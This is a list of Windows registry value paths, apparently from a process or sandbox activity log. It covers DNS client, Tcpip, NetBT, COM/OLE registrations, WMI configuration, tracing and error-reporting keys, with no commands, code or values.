HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseNewRegistration
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ResolverRegistration
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ResolverRegistrationOnly
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DnsQueryTimeouts
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DnsQueryTimeouts
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DnsQuickQueryTimeouts
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DnsQuickQueryTimeouts
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\PrimaryDomainName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Domain
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Hostname
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\EnableAdapterDomainNameRegistration
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AdapterDomainName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\QueryAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\DisableAdapterDomainName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\RegistrationEnabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\RegisterAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\RegistrationMaxAddressCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\MaxNumberOfAddressesToRegister
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\Domain
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\DhcpDomain
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\QueryAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\DisableAdapterDomainName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\RegistrationEnabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\DisableDynamicUpdate
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\RegisterAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\EnableAdapterDomainNameRegistration
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\RegistrationMaxAddressCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\MaxNumberOfAddressesToRegister
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\Domain
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\DhcpDomain
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\SearchList
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\SearchList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\NodeType
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\DhcpNodeType
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\ScopeId
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\DhcpScopeId
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\EnableProxy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\EnableDns
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\RegAsm_RASAPI32\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\RegAsm_RASAPI32\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\RegAsm_RASAPI32\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\RegAsm_RASAPI32\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\RegAsm_RASAPI32\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\RegAsm_RASAPI32\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\1DF4D951
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.JScript,8.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration.Install,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\FinalizerActivityBypass
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
HKEY_CURRENT_USER\Control Panel\International\sYearMonth
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\PCHealth\ErrorReporting\ForceQueueMode
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\PCHealth\ErrorReporting\ShowUI
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\PCHealth\ErrorReporting\DoReport
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\PCHealth\ErrorReporting\AllOrNone
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Server\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalServer32\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\AppID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalService
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\DllSurrogate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\RunAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\ActivateAtStorage
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\ROTFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\AppIDFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LaunchPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\LegacyAuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\LegacyImpersonationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\AuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\RemoteServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\SRPTrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\PreferredServerBitness
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LoadUserSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\SessionEnabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\Level
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\AreaFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\Session
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\LogFile
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\BufferSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MinimumBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MaximumBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MaximumFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\LogFileMode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\FlushTimer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\AgeLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\Setup\UpgradeInProgress
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Settings\ActiveWriterStateTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Diag\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Settings\TornComponentsMax
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000100-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9555-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9557-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F309AD18-D86A-11D0-A075-00C04FB68820}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\IdentifierLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\QueryLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\PathLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbThrottlingEnabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighMaxLimitFactor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbTaskMaxSleep
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold1Mult
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold2Mult
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold3Mult
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Unchecked Task Count
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\LastServiceStart
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Working Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Repository Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Build
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Logging Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\MOF Self-Install Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Default Repository Driver
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueCoreFsrepVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Repository Cache Spill Ratio
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\CheckPointValue
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SnapShotValue
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\CheckRepositoryOnNextStartup
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\NumWriteIdCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Class Cache Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Class Cache Item Age (ms)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\EnableObjectValidation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\NextAutoRecoverFile
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Enable Provider Subsystem
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{29C33724-2DB4-437F-8D9F-CF610068A4BF}\CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{29C33724-2DB4-437F-8D9F-CF610068A4BF}\Provider
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{29C33724-2DB4-437F-8D9F-CF610068A4BF}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{29C33724-2DB4-437F-8D9F-CF610068A4BF}\Locale
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{29C33724-2DB4-437F-8D9F-CF610068A4BF}\User
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{29C33724-2DB4-437F-8D9F-CF610068A4BF}\MarshaledProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{29C33724-2DB4-437F-8D9F-CF610068A4BF}\ProcessIdentifier
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{96588179-8AB1-4680-A060-9972C564941C}\CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{96588179-8AB1-4680-A060-9972C564941C}\Provider
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{96588179-8AB1-4680-A060-9972C564941C}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{96588179-8AB1-4680-A060-9972C564941C}\Locale
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{96588179-8AB1-4680-A060-9972C564941C}\User
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{96588179-8AB1-4680-A060-9972C564941C}\MarshaledProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{96588179-8AB1-4680-A060-9972C564941C}\ProcessIdentifier
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{BC163476-C110-4E13-9913-33CDA73BED4B}\CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{BC163476-C110-4E13-9913-33CDA73BED4B}\Provider
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{BC163476-C110-4E13-9913-33CDA73BED4B}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{BC163476-C110-4E13-9913-33CDA73BED4B}\Locale
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{BC163476-C110-4E13-9913-33CDA73BED4B}\User
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{BC163476-C110-4E13-9913-33CDA73BED4B}\MarshaledProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{BC163476-C110-4E13-9913-33CDA73BED4B}\ProcessIdentifier
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{FE821036-CBC7-4828-AF72-786292D4B041}\CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{FE821036-CBC7-4828-AF72-786292D4B041}\Provider
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{FE821036-CBC7-4828-AF72-786292D4B041}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{FE821036-CBC7-4828-AF72-786292D4B041}\Locale
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{FE821036-CBC7-4828-AF72-786292D4B041}\User
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{FE821036-CBC7-4828-AF72-786292D4B041}\MarshaledProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{FE821036-CBC7-4828-AF72-786292D4B041}\ProcessIdentifier
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\EnableEvents
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueEssToBeInitialized
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Low Threshold On Events (B)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\High Threshold On Events (B)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Wait On Events (ms)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Merger Query Arbitration Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SetupDate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\FinalizerBatchSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ClientCallbackTimeout
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\FinalizerQueueThreshold
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Tasks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Async Result Queue Size
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\SecurityCenter2
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\SecurityCenter2
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\(Default)
